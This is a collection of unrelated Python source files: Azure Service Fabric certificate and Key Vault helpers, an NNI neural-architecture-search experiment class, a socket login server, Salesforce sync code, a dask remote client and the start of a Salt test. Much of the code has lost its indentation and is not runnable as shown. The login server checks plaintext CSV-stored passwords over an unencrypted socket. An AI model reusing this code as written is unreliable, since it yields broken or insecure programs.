if size >= 7 and size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(k, parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(kk, vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
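# Minimal sketch (not wired to any CLI command) showing that the two fabric
# settings helpers above are inverses of each other; the section/parameter
# names are just an example.
def _example_fabric_settings_round_trip():
    setting_dict = {'Security': {'ClusterProtectionLevel': 'EncryptAndSign'}}
    settings = _dict_to_fabric_settings(setting_dict)
    # Converting back should yield the same dictionary.
    assert _fabric_settings_to_dict(settings) == setting_dict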
def _deploy_arm_template_core(cli_ctx,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cli_ctx)
if validate_only:
return client.deployments.validate(resource_group_name, deployment_name, properties, raw=no_wait)
deploy_poll = client.deployments.create_or_update(resource_group_name, deployment_name, properties, raw=no_wait)
result = LongRunningOperation(cli_ctx)(deploy_poll)
return result
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(resource_group_name):
certificate_name = resource_group_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
return "{}{}".format(certificate_name, suffix)
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name == vault_name]
return vault[0]
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
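# For reference, the secret identifier layout the two helpers above rely on
# (the URL is a made-up example):
#   https://myvault.vault.azure.net/secrets/mycert/0123456789abcdef
# urlparse(...).hostname.split('.')[0] yields 'myvault' (the vault name), and
# path.split('/') yields ['', 'secrets', 'mycert', '0123456789abcdef'], so
# segment[2] is the secret name and segment[3] is the secret version.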
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
import binascii
    with open(certificate_data, 'rb') as cert_file:
        certificate_data = cert_file.read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
        else:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(subject):
    if not subject.lower().startswith('cn'):
subject = "CN={0}".format(subject)
return _default_certificate_profile(subject)
def _default_certificate_profile(subject):
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
    cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
_create_self_signed_key_vault_certificate.__doc__ = KeyVaultClient.create_certificate.__doc__
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token))
return client
def _create_keyvault(cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=KeyVaultSkuName.standard.value,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
_create_keyvault.__doc__ = VaultProperties.__doc__
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.objects.get_current_user()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
        logger.warning("Multiple user principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
elif subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
else:
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
return parameters
def _set_parameters_for_customize_template(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
    output_file = None
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
if SOURCE_VAULT_VALUE not in parameters and CERTIFICATE_THUMBPRINT not in parameters and CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Primary certificate parameters are not present in parameters file')
else:
            raise CLIError('The primary certificate parameters in the parameters file must be named '
                           '\'sourceVaultValue\', \'certificateThumbprint\' and \'certificateUrlValue\'; '
                           'if secondary certificate parameters are also supplied, they must be named '
                           '\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
        parameters[SEC_SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[SEC_CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[SEC_CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
            raise CLIError('The secondary certificate parameters in the parameters file must be named '
                           '\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'; '
                           'either provide all three or none of them')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
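# Rough sketch of how the template helpers above compose when deploying the
# bundled default template. This is illustrative only; the real caller is the
# cluster-create command, which builds `parameters` via
# _set_parameters_for_default_template (or the customize variant) and supplies
# a generated deployment name.
#
#   template = _modify_template(linux=False)
#   _deploy_arm_template_core(cli_ctx, resource_group_name, template,
#                             parameters, deployment_name='sf-cluster-deployment')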
|
pytorch.py
|
import logging
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import torch
import torch.nn as nn
from nni.experiment import Experiment, TrainingServiceConfig
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from ..converter import convert_to_graph
from ..graph import Model, Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import process_inline_mutation
from ..strategy import BaseStrategy
from ..oneshot.interface import BaseOneShotTrainer
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = 'python3 -m nni.retiarii.trial_entry'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: Optional[PathLike] = None
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
            self.training_service = util.training_service_config_factory(platform=training_service_platform)
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
try:
script_module = torch.jit.script(self.base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
base_model_ir = convert_to_graph(script_module, self.base_model)
base_model_ir.evaluator = self.trainer
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
if mutators is not None and self.applied_mutators:
            raise RuntimeError('Mixed usage of LayerChoice/InputChoice and mutators is not supported yet; '
                               'do not use mutators when you use LayerChoice/InputChoice.')
if mutators is not None:
self.applied_mutators = mutators
_logger.info('Starting strategy...')
Thread(target=self.strategy.run, args=(base_model_ir, self.applied_mutators)).start()
_logger.info('Strategy started!')
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
super().start(port, debug)
self._start_strategy()
def _create_dispatcher(self):
return self._dispatcher
    def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> None:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
super().run(port, debug)
def export_top_models(self, top_n: int = 1):
"""
        Export several top-performing models.
"""
if top_n != 1:
            _logger.warning('Only top_n = 1 is supported for now.')
if isinstance(self.trainer, BaseOneShotTrainer):
return self.trainer.export()
else:
            _logger.info('For this experiment, you can find the best model from the WebUI.')
def retrain_model(self, model):
"""
        This function retrains the exported model and tests it to report test accuracy.
"""
raise NotImplementedError
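# Illustrative usage sketch (not part of this module). `MyModelSpace`, the
# trainer and the strategy are placeholders supplied by the caller; see the NNI
# Retiarii documentation for concrete classes.
#
#   import nni.retiarii.strategy as strategy
#   exp = RetiariiExperiment(MyModelSpace(), trainer,
#                            applied_mutators=[], strategy=strategy.Random())
#   exp_config = RetiariiExeConfig('local')
#   exp_config.trial_concurrency = 2
#   exp_config.max_trial_number = 10
#   exp.run(exp_config, port=8081)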
|
server3.py
|
import socket
import csv
import traceback
import threading
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
usrpass={}
def openfile():
    # Load username/password pairs from the CSV file into the usrpass dict.
    filename = "login_credentials.csv"
    with open(filename, 'r') as csvfile:
        csv_file = csv.reader(csvfile, delimiter=",")
        for col in csv_file:
            usrpass[col[0]] = col[1]
        usrpass.pop("Username")  # drop the CSV header row
        #print(usrpass)
ihost=socket.gethostname()
host=socket.gethostbyname(ihost)
iport=[]
hostfile="host.csv"
with open(hostfile,'r')as host_file:
csv_hfile = csv.reader(host_file, delimiter=",")
for row in csv_hfile:
iport.append(row[1])
port=int(iport[4])
def socketbind():
try:
s.bind(('',port))
print("Bind with host at port number : "+str(port))
s.listen(10)
print("Socket is listening!!")
except socket.error as msg:
print("Error in Binding: "+ str(msg)+"\n Retrying....")
socketbind()
def socketaccept():
conn,add=s.accept()
print("connection is established with IP : "+str(add[0])+" and Port Number : "+str(add[1]))
conn.send(bytes("1","utf-8"))
conversation(conn)
conn.close()
def conversation(conn):
    while True:
        username = str(conn.recv(1024), "utf-8")
        if not username:
            # Client closed the connection.
            break
        password = str(conn.recv(1024), "utf-8")
        res = checkpass(username, password)
        if res == 1:
            print("Valid Password!")
            conn.send(bytes("1", "utf-8"))
            conn.send(bytes("1", "utf-8"))
        else:
            conn.send(bytes("-1", "utf-8"))
            conn.send(bytes("-1", "utf-8"))
# def checkusr(username):
# if username in usrpass:
# return 1
# else:
# print("Invalid Username")
# return -1
def checkpass(username, password):
    # Use .get() so an unknown username does not crash the server with KeyError.
    if usrpass.get(username) == password:
        return 1
    print("Invalid username or password")
    return -1
def main():
openfile()
socketbind()
socketaccept()
# count=0
# while (count<6):
# new_thread=threading.Thread(target =socketaccept)
# new_thread.start()
# count=count+1
main()
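# Minimal client-side sketch (not part of this file) showing the protocol the
# server expects: read the "1" handshake, send the username and password as two
# separate messages, then read the two result codes ("1"/"1" or "-1"/"-1").
#
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect((host, port))
#   print(c.recv(1024).decode("utf-8"))   # handshake "1"
#   c.send(bytes("alice", "utf-8"))       # username (placeholder)
#   c.send(bytes("secret", "utf-8"))      # password (placeholder)
#   print(c.recv(1024).decode("utf-8"))   # "1" on success, "-1" otherwise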
|
contact.py
|
from common.models import Tag
from .client import SalesforceClient
import json
import requests
import threading
''' Contributor model maps to the Contact object in Salesforce '''
client = SalesforceClient()
def run(request):
    # The response is intentionally unused; callers invoke this on a daemon thread.
    SalesforceClient().send(request)
def save(contributor: object):
data = {
"ownerid": client.owner_id,
"firstname": contributor.first_name,
"lastname": contributor.last_name,
"email": contributor.username,
"phone": contributor.phone_primary,
"mailingpostalcode": contributor.postal_code,
"mailingcountry": contributor.country,
"npo02__membershipjoindate__c": contributor.date_joined.strftime('%Y-%m-%d'),
"description": contributor.about_me,
'technologies__c': Tag.tags_field_descriptions(contributor.user_technologies)
}
req = requests.Request(
method="PATCH",
url=f'{client.contact_endpoint}/platform_id__c/{contributor.id}',
data=json.dumps(data),
)
thread = threading.Thread(target=run, args=(req,))
thread.daemon = True
thread.start()
def delete(contributor: object):
req = requests.Request(
method="DELETE",
url=f'{client.contact_endpoint}/platform_id__c/{contributor.id}'
)
thread = threading.Thread(target=run, args=(req,))
thread.daemon = True
thread.start()
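# Usage sketch (illustrative; the Contributor model lives elsewhere in the
# project): both helpers fire their Salesforce request on a daemon thread, so
# callers never block on the HTTP round trip.
#
#   save(contributor)    # upserts the Contact keyed on platform_id__c
#   delete(contributor)  # deletes the Contact for that platform id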
|
remote.py
|
import os
import time
import signal
import logging
import subprocess
import concurrent
from threading import Thread
import multiprocessing as mp
from distributed import Client
from .ssh_helper import start_scheduler, start_worker
__all__ = ['Remote']
logger = logging.getLogger(__name__)
class Remote(Client):
LOCK = mp.Lock()
REMOTE_ID = mp.Value('i', 0)
def __init__(self, remote_ip=None, port=None, local=False, ssh_username=None,
ssh_port=22, ssh_private_key=None, remote_python=None,
remote_dask_worker="distributed.cli.dask_worker"):
self.service = None
if not local:
remote_addr = (remote_ip + ':{}'.format(port))
self.service = DaskRemoteService(remote_ip, port, ssh_username,
ssh_port, ssh_private_key, remote_python,
remote_dask_worker)
super(Remote, self).__init__(remote_addr)
else:
super(Remote, self).__init__(processes=False)
with Remote.LOCK:
self.remote_id = Remote.REMOTE_ID.value
Remote.REMOTE_ID.value += 1
def upload_files(self, files, **kwargs):
for filename in files:
self.upload_file(filename, **kwargs)
def shutdown(self):
self.close()
if self.service:
self.service.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
        self.shutdown()
@classmethod
def create_local_node(cls, ip, port):
return cls(ip, port, local=True)
def __repr__(self):
reprstr = self.__class__.__name__ + ' REMOTE_ID: {}, \n\t'.format(self.remote_id) + \
super(Remote, self).__repr__()
return reprstr
class DaskRemoteService(object):
def __init__(self, remote_addr, scheduler_port, ssh_username=None,
ssh_port=22, ssh_private_key=None, remote_python=None,
remote_dask_worker="distributed.cli.dask_worker"):
self.scheduler_addr = remote_addr
self.scheduler_port = scheduler_port
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.remote_python = remote_python
self.remote_dask_worker = remote_dask_worker
self.monitor_thread = Thread()
# Start the scheduler node
self.scheduler = start_scheduler(
remote_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.worker = start_worker(
self.scheduler_addr,
self.scheduler_port,
remote_addr,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.remote_python,
self.remote_dask_worker,
)
self.start_monitoring()
def start_monitoring(self):
if self.monitor_thread.is_alive():
return
self.monitor_thread = Thread(target=self.monitor_remote_processes)
self.monitor_thread.start()
def monitor_remote_processes(self):
all_processes = [self.scheduler, self.worker]
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
try:
msg = process["output_queue"].get()
if 'distributed.' not in msg:
print(msg)
except Exception:
break
# Kill some time and free up CPU
time.sleep(0.1)
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
import tornado
all_processes = [self.worker, self.scheduler]
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
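# Usage sketch (illustrative addresses/credentials): Remote is a dask
# distributed Client, so it can be used as a context manager and tasks can be
# submitted to the SSH-launched scheduler/worker pair.
#
#   with Remote(remote_ip='192.0.2.10', port=8786, ssh_username='ubuntu') as remote:
#       remote.upload_files(['train.py'])
#       future = remote.submit(lambda x: x + 1, 41)
#       print(future.result())   # 42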
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
import datetime
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import NO_MOCK, NO_MOCK_REASON
# Import Salt libs
from salt.utils import immutabletypes
from salt.utils.odict import OrderedDict
import salt.exceptions
import salt.payload
# Import 3rd-party libs
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
payload = salt.payload.Serial('msgpack')
